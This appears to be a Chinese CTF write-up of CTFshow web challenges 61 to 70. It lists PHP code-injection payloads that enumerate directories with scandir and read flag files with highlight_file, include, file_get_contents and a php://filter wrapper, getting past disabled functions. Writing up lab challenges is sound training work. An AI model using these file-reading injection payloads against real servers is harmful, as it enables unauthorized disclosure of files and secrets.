您现在的位置是:首页 >技术交流 >《CTFshow-Web入门》07. Web 61~70网站首页技术交流
《CTFshow-Web入门》07. Web 61~70
简介《CTFshow-Web入门》07. Web 61~70
ctf - web入门
web61~65
题解
这几个题都和 web58 一样。可能内部禁用的函数不一样吧。但 payload 都差不多。不多解释了。
以下解法随便挑一个即可。可能不同题会有部分函数被禁。
payload1:
c=include "php://filter/read=convert.base64-encode/resource=flag.php";
payload2:
c=show_source('flag.php');
payload3:
c=file_get_contents('flag.php');
payload4:
c=highlight_file("flag.php");
web66
知识点
PHP 中:
- scandir():扫描目录。
题解
题目没变化。
随便试一个函数。
根据提示,先扫一下根目录。
c=print_r(scandir('/'));
可得 payload:
c=highlight_file("/flag.txt");
web67
知识点
- var_dump():打印变量的相关信息
题解
题目就不贴了。和前几题一模一样的。
区别在于,print_r()
函数被禁了。
那就用 var_dump()
函数。
c=var_dump(scandir('/'));
payload:
c=highlight_file("/flag.txt");
web68
知识点
- include():表达式包含并运行指定文件。
题解
一上来就说 highlight_file() 函数被禁了。
先尝试扫一下根目录。
c=var_dump(scandir('/'));
那就使用 include() 函数将文件内容包含进来。
payload:
c=include("/flag.txt");
web69
知识点
- var_export:输出或返回变量的可解析字符串表示。
题解
题目与 web68 一样。
但是 var_dump() 被禁了。
换一个函数即可。
c=var_export(scandir("/"));
payload:
c=include("/flag.txt");
web70
知识点
- error_reporting():设置应该报告何种 PHP 错误。
- ini_set():配置选项设置值。
对这题来说没啥用的函数。
题解
看题,禁用了一堆函数。
但其实沿用 web69 的方法即可。
c=var_export(scandir("/"));
c=include("/flag.txt");
一笑出门去,千里落花风。
——《水调歌头 · 我饮不须劝》(宋)辛弃疾
风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。